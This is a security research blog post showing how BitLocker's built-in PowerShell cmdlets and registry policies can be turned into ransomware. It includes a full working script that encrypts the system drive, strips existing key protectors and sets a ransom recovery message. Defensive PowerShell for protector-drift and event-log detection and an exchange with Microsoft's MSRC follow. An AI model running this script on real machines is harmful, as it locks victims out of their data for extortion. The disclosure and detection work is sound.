Bitlocker Ransomware: Using BitLocker for Nefarious Reasons
I don’t know how I got there, but a few days ago I found myself reading an article on the new “features” Microsoft has added to BitLocker in Windows 10. The one that really caught my attention was a new group policy for configuring the pre-boot recovery screen. That does not sound exciting by itself, but combine it with a feature introduced in Windows 8, where the OS drive can be encrypted without a TPM (Trusted Platform Module) and even without a USB startup key, and you have a recipe for evil.
When I presented this to BHIS they had questions of their own. More research showed that a local administrator can strip the recovery keys and passwords from a protected drive and replace them without knowing what the old passwords or keys were to begin with.
BitLocker Based Ransomware!
Using the BitLocker cmdlets for PowerShell I wrote a script that encrypts the system drive with a custom recovery message. The script locks the drive and throws away the recovery key by writing the key file to the very drive being encrypted, where it cannot be read at pre-boot. The only way to unlock the drive is with the password.
If the drive is already protected with BitLocker the script strips out all of the passwords and recovery keys and replaces them.
Note: The script requires local administrative rights.
```powershell
#BitLocker for Ransom
#Is BitLocker already enabled on the system drive
$Check  = (Get-BitLockerVolume -MountPoint $ENV:SystemDrive)
$Status = $Check.ProtectionStatus
if($Status -eq 'Off'){ Write-Output 'BitLocker NOT Enabled on System Drive' }
if($Status -eq 'On') { Write-Output 'BitLocker IS Enabled on System Drive' }

#Set registry first: allow BitLocker on the OS drive without a TPM and turn on
#the advanced startup options so the password protector is accepted.
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPM /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPMKey /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f

#Change the recovery message to meet your needs. In my example I put a fake
#website where the victim can come and pay for their password.
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v RecoveryKeyMessage /t REG_SZ /d 'please Visit my hacker site https://yourscrewed.hahaha to give me money' /f
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v RecoveryKeyMessageSource /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f

#Use a Strong Password Here!
$PlainPassword  = "P@ssw0rd"
$SecurePassword = $PlainPassword | ConvertTo-SecureString -AsPlainText -Force

if($Status -eq 'Off'){
    #Enable BitLocker, encrypt the used space on the C: drive
    Enable-BitLocker -EncryptionMethod Aes256 -Password $SecurePassword -MountPoint $ENV:SystemDrive -PasswordProtector -SkipHardwareTest -UsedSpaceOnly
    #To use the custom recovery screen, there must be a recovery key created. I don't
    #want to use the recovery key, so I put the .BEK file on the encrypted C: drive
    #where it is inaccessible at pre-boot.
    Add-BitLockerKeyProtector -MountPoint $ENV:SystemDrive -RecoveryKeyProtector -RecoveryKeyPath $ENV:SystemDrive\
    #Uncomment to restart the computer ASAP so that the damage is done before the
    #user can undo it. I don't do this by default.
    #Restart-Computer
}

#If BitLocker is already enabled on the system drive, the following will execute,
#removing all passwords and recovery keys, then adding my own just like before.
if ($Status -eq 'On'){
    #Strip all passwords and recovery keys (not yet tested with TPM).
    #Once the last protector is gone BitLocker keeps the volume key in the clear,
    #so the drive stays readable until Resume-BitLocker below re-protects it.
    $IDS = $Check.KeyProtector.KeyProtectorID
    foreach($ID in $IDS){
        Remove-BitLockerKeyProtector -MountPoint $ENV:SystemDrive -KeyProtectorID $ID
    }
    Add-BitLockerKeyProtector -MountPoint $ENV:SystemDrive -PasswordProtector -Password $SecurePassword
    Add-BitLockerKeyProtector -MountPoint $ENV:SystemDrive -RecoveryKeyProtector -RecoveryKeyPath $ENV:SystemDrive\
    Resume-BitLocker -MountPoint $ENV:SystemDrive
}
##ENDSCRIPT##
```
The script runs in seconds, and the next time the computer reboots the user is met with the usual BitLocker password prompt. Pressing ESC shows the recovery options, including the custom recovery message that the script wrote into the registry.
And there you have it: ransomware built from Microsoft’s own built-in features and tools. I will not go into how to weaponize this into a payload or force an elevation prompt; there are plenty of blog posts and videos on the internet that already cover that.
The script contains a commented-out line that restarts the computer as soon as the script finishes, which prevents the user from halting the encryption. I leave it commented out by default because I think most users will ignore the small notification that warns them the drive is being encrypted. In my experience that notification only appears when the drive was not already encrypted before the script ran.
Research Caveats
I did all of this research on a fresh workgroup install of the Windows 10 Evaluation edition. Nothing suggests to me that a domain-joined system would behave differently, since BitLocker reads the registry settings that are current when the cmdlets run, not the ones that were loaded at boot time.
Defenses – Be Prepared to Lose Everything
Back up your personal data. If everything you need is in the cloud, on an external device, or in some other remote storage, you will be fine.
Defenses – How do I Identify this is happening?
Detection With PowerShell or CMD
This is simple to detect if you are looking for it: the same cmdlets that enabled BitLocker will tell you whether it is on and which key protectors exist. Windows can run a script at shutdown or restart (a Group Policy shutdown script) or on a regular interval (a scheduled task) that queries whether BitLocker is on and what and where the recovery keys and protector types are. Compare the current protector set to what you know it should be; if it differs, reset the keys, send an alert to the helpdesk, and so on.
The manage-bde.exe tool does the same jobs as the PowerShell cmdlets if you are more comfortable with cmd and batch scripts.
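One way to do the comparison described above with the same cmdlets, as an added example that is not part of the original post or the author’s GitHub script: record a baseline of the system drive’s key protectors once on a known-good machine, then have a scheduled task or shutdown script re-snapshot and diff. The baseline file location, the function names, and the constructed protector IDs in the dry run are my own assumptions, not anything the author published.

```powershell
param([switch]$Live)   # without -Live only the constructed dry run below executes

# Added example, not from the original post. Needs the BitLocker module
# (Windows 8 / Server 2012 or later) and local admin rights for the live path.
# The baseline location is an assumption; use one your scheduled task can read.
$BaselinePath = Join-Path $env:ProgramData 'bitlocker-baseline.json'

# Reduce a volume to what matters for this attack: protection state and the
# set of key protectors (type + ID). The ransomware script above removes every
# existing protector and adds a Password and an ExternalKey (.BEK) protector,
# so both the IDs and the protector types change.
function Get-BitLockerSnapshot {
    param([string]$MountPoint = $env:SystemDrive)
    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    [pscustomobject]@{
        MountPoint       = $vol.MountPoint
        ProtectionStatus = [string]$vol.ProtectionStatus    # 'On' or 'Off'
        Protectors       = @($vol.KeyProtector | ForEach-Object {
            [pscustomobject]@{ Id = $_.KeyProtectorId; Type = [string]$_.KeyProtectorType }
        })
    }
}

# Pure diff of two snapshots: one string per finding, empty array means no
# drift. No BitLocker calls, so it can be exercised with constructed objects.
function Compare-BitLockerSnapshot {
    param([Parameter(Mandatory)]$Baseline, [Parameter(Mandatory)]$Current)
    $findings = New-Object System.Collections.Generic.List[string]

    if ($Current.ProtectionStatus -ne $Baseline.ProtectionStatus) {
        $findings.Add("ProtectionStatus changed: $($Baseline.ProtectionStatus) -> $($Current.ProtectionStatus)")
    }
    $baseIds   = @($Baseline.Protectors | ForEach-Object { $_.Id })
    $currIds   = @($Current.Protectors  | ForEach-Object { $_.Id })
    $baseTypes = @($Baseline.Protectors | ForEach-Object { $_.Type })

    foreach ($p in $Baseline.Protectors) {
        if ($currIds -notcontains $p.Id) { $findings.Add("Known $($p.Type) protector $($p.Id) was removed") }
    }
    foreach ($p in $Current.Protectors) {
        if ($baseIds -notcontains $p.Id) { $findings.Add("Unknown $($p.Type) protector $($p.Id) was added") }
        # A protector TYPE the build never had (a Password protector on a
        # TPM-only deployment, say) deserves its own line.
        if ($baseTypes -notcontains $p.Type) { $findings.Add("Protector type not in baseline: $($p.Type)") }
    }
    return ,$findings.ToArray()
}

if (-not $Live) {
    # Dry run on constructed data: a TPM + recovery-password build that has been
    # hit by the script above. IDs are made up; real ones are GUIDs in braces.
    $before = [pscustomobject]@{
        ProtectionStatus = 'On'
        Protectors = @([pscustomobject]@{ Id = '{1111-TPM}'; Type = 'Tpm' },
                       [pscustomobject]@{ Id = '{2222-RP}';  Type = 'RecoveryPassword' })
    }
    $after = [pscustomobject]@{
        ProtectionStatus = 'On'
        Protectors = @([pscustomobject]@{ Id = '{3333-PW}';  Type = 'Password' },
                       [pscustomobject]@{ Id = '{4444-EK}';  Type = 'ExternalKey' })
    }
    # Prints two removals, two additions and two "type not in baseline" lines.
    Compare-BitLockerSnapshot -Baseline $before -Current $after
} elseif (-not (Test-Path $BaselinePath)) {
    # First live run on a known-good machine: record the baseline.
    Get-BitLockerSnapshot | ConvertTo-Json -Depth 4 | Set-Content -Path $BaselinePath
} else {
    # Every later run (scheduled task, shutdown script): diff and warn.
    $baseline = Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json
    $drift = Compare-BitLockerSnapshot -Baseline $baseline -Current (Get-BitLockerSnapshot)
    if ($drift.Count -gt 0) {
        # Hook your alerting here (event log, SIEM forwarder, helpdesk ticket).
        Write-Warning ("BitLocker protector drift on {0}:`n{1}" -f $env:COMPUTERNAME, ($drift -join "`n"))
    }
}
```

Two caveats when you deploy something like this. Legitimate recovery-password rotation (an MBAM or Intune policy, or a helpdesk re-key) will also show up as drift, so refresh the baseline as part of that process rather than tuning the check down. And, as the MSRC reply below points out, an attacker who already has local admin can disable the scheduled task or delete the baseline, so the alert only counts if it leaves the box (a forwarded event, a SIEM message, a ticket) before the reboot.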
Detection With Event Logs
BitLocker writes events by default to Applications and Services Logs → Microsoft → Windows → BitLocker-API → Management (the channel Microsoft-Windows-BitLocker/BitLocker Management). Event 775 occurs when a key protector is created. Event 768 occurs when encryption starts on a drive (at least on the C: drive in my testing). Events 796 and 780 also occurred during my experiment. Alerting on these events is a great way to detect BitLocker being turned on or off or the keys being changed.
Also, avoid handing attackers administrative privileges in the first place, and use the usual malware defenses: scan email attachments, run user awareness training, and so on.
Personally I think Microsoft made a big mistake in allowing BitLocker to be configured without forcing the use of a USB key or TPM, and they really missed the security mark by not requiring reauthentication with the existing password or recovery key before it can be changed.
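The same event IDs as a query a defender can run by hand or wire to a scheduled-task trigger, as an added example that is not part of the original post. The channel name is the one behind the Event Viewer path in the text; the 24-hour lookback, the function names, and the alert wording are my choices, and 780 and 796 are included only because the post says they occurred, not because I know what they signify.

```powershell
# Added example, not from the original post. Pulls the last 24 hours of the
# BitLocker management channel (Event Viewer: Applications and Services Logs >
# Microsoft > Windows > BitLocker-API > Management) for the IDs the post
# observed and turns them into alert rows.
$LogName = 'Microsoft-Windows-BitLocker/BitLocker Management'

# The same XPath can be pasted into a Task Scheduler "On an event" custom
# trigger or a Windows Event Forwarding subscription, so one rule serves
# ad-hoc queries, scheduled checks and central collection alike.
$FilterXml = @"
<QueryList>
  <Query Id="0" Path="$LogName">
    <Select Path="$LogName">
      *[System[(EventID=768 or EventID=775 or EventID=780 or EventID=796)
        and TimeCreated[timediff(@SystemTime) &lt;= 86400000]]]
    </Select>
  </Query>
</QueryList>
"@

function Get-BitLockerChangeEvents {
    # Get-WinEvent raises an error (not an empty result) when nothing matches;
    # a quiet log is the normal case, so silence that one.
    Get-WinEvent -FilterXml ([xml]$FilterXml) -ErrorAction SilentlyContinue
}

# Reduce an event record to what an alert needs: when, which ID, who, and the
# first line of the message (which names the volume).
function ConvertTo-BitLockerAlert {
    param([Parameter(ValueFromPipeline)]$Record)
    process {
        $who = $null
        if ($Record.UserId) {
            try   { $who = $Record.UserId.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $who = $Record.UserId.Value }   # SID that no longer resolves
        }
        [pscustomobject]@{
            Time    = $Record.TimeCreated
            Id      = $Record.Id
            User    = $who
            Summary = ($Record.Message -split "`r?`n")[0]
        }
    }
}

$alerts = @(Get-BitLockerChangeEvents | ConvertTo-BitLockerAlert)
$alerts | Sort-Object Time | Format-Table -AutoSize

# On a machine that was already encrypted, 768 (encryption started) or 775
# (key protector created) outside a change window is the fingerprint of the
# script above. Raise those; keep the rest as context for the analyst.
$hot = @($alerts | Where-Object { $_.Id -in 768, 775 })
if ($hot.Count -gt 0) {
    Write-Warning ("{0} BitLocker encryption/protector event(s) on {1} in the last 24h" -f $hot.Count, $env:COMPUTERNAME)
}
```

Because the XPath is the same filter Event Viewer builds for a custom view, you can validate it there first and then paste it into the trigger or subscription unchanged. Forward the channel centrally if you can: a local alert is only useful if it is seen before the reboot that locks the drive.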
I reached out to the Microsoft Security Response Center expressing my concerns with the current implementation of BitLocker and they were so kind as to respond.
Microsoft MSRC Rep.
“Hello,
Thank you for contacting the Microsoft Security Response Center (MSRC). To use BitLocker in this way the malicious person would need to have already compromised the machine and would have Administrator Privilege, in that case they could do whatever they wanted to the system, just as any local administrator could.
Regards,
MSRC”
I replied back.
“There are many security technologies in place today that even though my system is compromised the attacker still has to authenticate to change the password. Is there a way I can implement BitLocker in such a way to force the administrator to authenticate the Recovery Key before changing it?
Is Microsoft considering adding functionality like this to BitLocker in the future?”
Microsoft Responded.
“Thank you for contacting the Microsoft Security Response Center (MSRC). This would not be a security vulnerability and is likely by design. You can submit the suggestion to the Windows team using the Windows Feedback app in Windows 10.”
Microsoft does take security seriously; I just need to find the right way to release this information. I will follow the suggestion from Microsoft from inside a virtual machine, since I don’t like to tie my operating system to my Microsoft account. Call me old fashioned.
_____
To grab a copy/paste version of the code visit Robert’s GitHub here.